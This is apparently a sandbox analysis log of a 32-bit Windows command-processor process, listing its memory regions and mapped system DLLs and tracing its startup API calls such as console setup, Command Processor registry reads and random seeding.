region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 2170
start_va = 0x7efb0000
end_va = 0x7efd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 2171
start_va = 0x7efdb000
end_va = 0x7efddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 2172
start_va = 0x7efde000
end_va = 0x7efdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 2173
start_va = 0x7efdf000
end_va = 0x7efdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 2174
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2175
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2176
start_va = 0x7fff0000
end_va = 0x7fffffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 2177
start_va = 0x70000
end_va = 0xeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2178
start_va = 0x752a0000
end_va = 0x752a7fff
entry_point = 0x752a0000
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2179
start_va = 0x752b0000
end_va = 0x7530bfff
entry_point = 0x752b0000
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 2180
start_va = 0x75310000
end_va = 0x7534efff
entry_point = 0x75310000
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 2181
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2182
start_va = 0xf0000
end_va = 0x156fff
entry_point = 0xf0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2183
start_va = 0x3a0000
end_va = 0x49ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 2184
start_va = 0x75f40000
end_va = 0x75f85fff
entry_point = 0x75f40000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2185
start_va = 0x76220000
end_va = 0x7632ffff
entry_point = 0x76220000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2186
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x0
region_type = private
name = "private_0x0000000077a20000"
filename = ""
Region:
id = 2187
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000077b20000"
filename = ""
Region:
id = 2188
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2189
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2195
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2196
start_va = 0x650000
end_va = 0x65ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 2197
start_va = 0x74820000
end_va = 0x74826fff
entry_point = 0x74820000
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll")
Region:
id = 2198
start_va = 0x75970000
end_va = 0x7597bfff
entry_point = 0x75970000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2199
start_va = 0x75980000
end_va = 0x759dffff
entry_point = 0x75980000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2200
start_va = 0x759e0000
end_va = 0x759f8fff
entry_point = 0x759e0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2201
start_va = 0x75a10000
end_va = 0x75abbfff
entry_point = 0x75a10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2202
start_va = 0x75fa0000
end_va = 0x7603cfff
entry_point = 0x75fa0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2203
start_va = 0x760d0000
end_va = 0x761bffff
entry_point = 0x760d0000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2204
start_va = 0x76490000
end_va = 0x7652ffff
entry_point = 0x76490000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2205
start_va = 0x76a70000
end_va = 0x76afffff
entry_point = 0x76a70000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2206
start_va = 0x77810000
end_va = 0x77819fff
entry_point = 0x77810000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2207
start_va = 0x77820000
end_va = 0x7791ffff
entry_point = 0x77820000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2208
start_va = 0x4a0000
end_va = 0x627fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004a0000"
filename = ""
Region:
id = 2209
start_va = 0x75c00000
end_va = 0x75c5ffff
entry_point = 0x75c00000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2210
start_va = 0x75e50000
end_va = 0x75f1bfff
entry_point = 0x75e50000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2211
start_va = 0x30000
end_va = 0x36fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2212
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 2213
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2214
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 2215
start_va = 0x660000
end_va = 0x7e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 2216
start_va = 0x7f0000
end_va = 0x1beffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 2217
start_va = 0x1bf0000
end_va = 0x1f32fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bf0000"
filename = ""
Region:
id = 2218
start_va = 0x1f40000
end_va = 0x203ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f40000"
filename = ""
Region:
id = 2225
start_va = 0x76b00000
end_va = 0x77749fff
entry_point = 0x76b00000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 2226
start_va = 0x75c60000
end_va = 0x75cb6fff
entry_point = 0x75c60000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2227
start_va = 0x190000
end_va = 0x191fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 2228
start_va = 0x74960000
end_va = 0x74afdfff
entry_point = 0x74960000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 2229
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x1a0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2230
start_va = 0x1f0000
end_va = 0x1f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2231
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 2232
start_va = 0x2040000
end_va = 0x230efff
entry_point = 0x2040000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2234
start_va = 0x2340000
end_va = 0x237ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002340000"
filename = ""
Region:
id = 2235
start_va = 0x24c0000
end_va = 0x25bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 2236
start_va = 0x75cf0000
end_va = 0x75e4bfff
entry_point = 0x75cf0000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 2237
start_va = 0x7efd8000
end_va = 0x7efdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 2238
start_va = 0x2440000
end_va = 0x247ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002440000"
filename = ""
Region:
id = 2239
start_va = 0x75210000
end_va = 0x7528ffff
entry_point = 0x75210000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 2240
start_va = 0x25c0000
end_va = 0x269efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000025c0000"
filename = ""
Region:
id = 2241
start_va = 0x74650000
end_va = 0x74744fff
entry_point = 0x74650000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 2242
start_va = 0x76720000
end_va = 0x767aefff
entry_point = 0x76720000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 2243
start_va = 0x200000
end_va = 0x200fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 2244
start_va = 0x76040000
end_va = 0x760c2fff
entry_point = 0x76040000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 2246
start_va = 0x210000
end_va = 0x210fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 2247
start_va = 0x747f0000
end_va = 0x74810fff
entry_point = 0x747f0000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 2248
start_va = 0x76530000
end_va = 0x76574fff
entry_point = 0x76530000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 2249
start_va = 0x230000
end_va = 0x24ffff
entry_point = 0x230000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db")
Region:
id = 2250
start_va = 0x250000
end_va = 0x250fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 2251
start_va = 0x75950000
end_va = 0x7595afff
entry_point = 0x75950000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 2252
start_va = 0x220000
end_va = 0x223fff
entry_point = 0x220000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2253
start_va = 0x260000
end_va = 0x28ffff
entry_point = 0x260000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db")
Region:
id = 2254
start_va = 0x290000
end_va = 0x293fff
entry_point = 0x290000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2255
start_va = 0x2380000
end_va = 0x23e5fff
entry_point = 0x2380000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2256
start_va = 0x26e0000
end_va = 0x27dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 2257
start_va = 0x27f0000
end_va = 0x282ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 2258
start_va = 0x75f20000
end_va = 0x75f31fff
entry_point = 0x75f20000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 2259
start_va = 0x76580000
end_va = 0x7671cfff
entry_point = 0x76580000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 2260
start_va = 0x77750000
end_va = 0x77776fff
entry_point = 0x77750000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 2261
start_va = 0x7efd5000
end_va = 0x7efd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 2262
start_va = 0x2830000
end_va = 0x2c22fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002830000"
filename = ""
Region:
id = 2263
start_va = 0x74600000
end_va = 0x7464bfff
entry_point = 0x74600000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 2264
start_va = 0x2c30000
end_va = 0x2c6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c30000"
filename = ""
Region:
id = 2265
start_va = 0x2db0000
end_va = 0x2eaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 2266
start_va = 0x74460000
end_va = 0x7448dfff
entry_point = 0x74460000
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll")
Region:
id = 2267
start_va = 0x7efad000
end_va = 0x7efaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 2271
start_va = 0x75ac0000
end_va = 0x75bf5fff
entry_point = 0x75ac0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 2272
start_va = 0x76330000
end_va = 0x7644cfff
entry_point = 0x76330000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 2273
start_va = 0x767e0000
end_va = 0x769dafff
entry_point = 0x767e0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 2274
start_va = 0x77800000
end_va = 0x7780bfff
entry_point = 0x77800000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 2275
start_va = 0x77920000
end_va = 0x77a14fff
entry_point = 0x77920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 2276
start_va = 0x2f00000
end_va = 0x2f3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f00000"
filename = ""
Region:
id = 2277
start_va = 0x3090000
end_va = 0x318ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003090000"
filename = ""
Region:
id = 2278
start_va = 0x7efaa000
end_va = 0x7efacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Thread:
id = 193
os_tid = 0x3b0
[0083.778] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39faf4 | out: lpSystemTimeAsFileTime=0x39faf4*(dwLowDateTime=0xc4a09a60, dwHighDateTime=0x1d48634))
[0083.778] GetCurrentProcessId () returned 0x330
[0083.778] GetCurrentThreadId () returned 0x3b0
[0083.778] GetTickCount () returned 0x22950
[0083.778] QueryPerformanceCounter (in: lpPerformanceCount=0x39faec | out: lpPerformanceCount=0x39faec*=1816278900000) returned 1
[0083.780] GetModuleHandleA (lpModuleName=0x0) returned 0x4ab30000
[0083.780] __set_app_type (_Type=0x1)
[0083.780] __p__fmode () returned 0x75ab31f4
[0083.780] __p__commode () returned 0x75ab31fc
[0083.780] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab521a6) returned 0x0
[0083.780] __getmainargs (in: _Argc=0x4ab54238, _Argv=0x4ab54240, _Env=0x4ab5423c, _DoWildCard=0, _StartInfo=0x4ab54140 | out: _Argc=0x4ab54238, _Argv=0x4ab54240, _Env=0x4ab5423c) returned 0
[0083.780] GetCurrentThreadId () returned 0x3b0
[0083.780] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3b0) returned 0x60
[0083.781] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000
[0083.781] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f
[0083.781] SetThreadUILanguage (LangId=0x0) returned 0x409
[0083.781] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0083.781] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39fa84 | out: phkResult=0x39fa84*=0x0) returned 0x2
[0083.781] VirtualQuery (in: lpAddress=0x39fabb, lpBuffer=0x39fa54, dwLength=0x1c | out: lpBuffer=0x39fa54*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0083.781] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39fa54, dwLength=0x1c | out: lpBuffer=0x39fa54*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
[0083.781] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39fa54, dwLength=0x1c | out: lpBuffer=0x39fa54*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
[0083.781] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39fa54, dwLength=0x1c | out: lpBuffer=0x39fa54*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0083.782] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39fa54, dwLength=0x1c | out: lpBuffer=0x39fa54*(BaseAddress=0x3a0000, AllocationBase=0x3a0000, AllocationProtect=0x4, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0083.782] GetConsoleOutputCP () returned 0x1b5
[0083.782] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab54260 | out: lpCPInfo=0x4ab54260) returned 1
[0083.782] SetConsoleCtrlHandler (HandlerRoutine=0x4ab4e72a, Add=1) returned 1
[0083.782] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.782] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
[0083.782] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab541ac | out: lpMode=0x4ab541ac) returned 1
[0083.782] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.782] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0083.783] _get_osfhandle (_FileHandle=0) returned 0x3
[0083.783] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab541b0 | out: lpMode=0x4ab541b0) returned 1
[0083.783] _get_osfhandle (_FileHandle=0) returned 0x3
[0083.783] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
[0083.783] GetEnvironmentStringsW () returned 0x3b3928*
[0083.784] FreeEnvironmentStringsW (penv=0x3b3928) returned 1
[0083.784] GetEnvironmentStringsW () returned 0x3b3928*
[0083.784] FreeEnvironmentStringsW (penv=0x3b3928) returned 1
[0083.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e9f4 | out: phkResult=0x39e9f4*=0x68) returned 0x0
[0083.784] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x0, lpData=0x39ea00*=0x0, lpcbData=0x39e9f8*=0x1000) returned 0x2
[0083.784] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x1, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.784] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x0, lpData=0x39ea00*=0x1, lpcbData=0x39e9f8*=0x1000) returned 0x2
[0083.784] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x0, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x40, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x40, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x0, lpData=0x39ea00*=0x40, lpcbData=0x39e9f8*=0x1000) returned 0x2
[0083.785] RegCloseKey (hKey=0x68) returned 0x0
[0083.785] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e9f4 | out: phkResult=0x39e9f4*=0x68) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x0, lpData=0x39ea00*=0x40, lpcbData=0x39e9f8*=0x1000) returned 0x2
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x1, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x0, lpData=0x39ea00*=0x1, lpcbData=0x39e9f8*=0x1000) returned 0x2
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x0, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x9, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x4, lpData=0x39ea00*=0x9, lpcbData=0x39e9f8*=0x4) returned 0x0
[0083.785] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e9fc, lpData=0x39ea00, lpcbData=0x39e9f8*=0x1000 | out: lpType=0x39e9fc*=0x0, lpData=0x39ea00*=0x9, lpcbData=0x39e9f8*=0x1000) returned 0x2
[0083.785] RegCloseKey (hKey=0x68) returned 0x0
[0083.785] time (in: timer=0x0 | out: timer=0x0) returned 0x5bfd1045
[0083.785] srand (_Seed=0x5bfd1045)
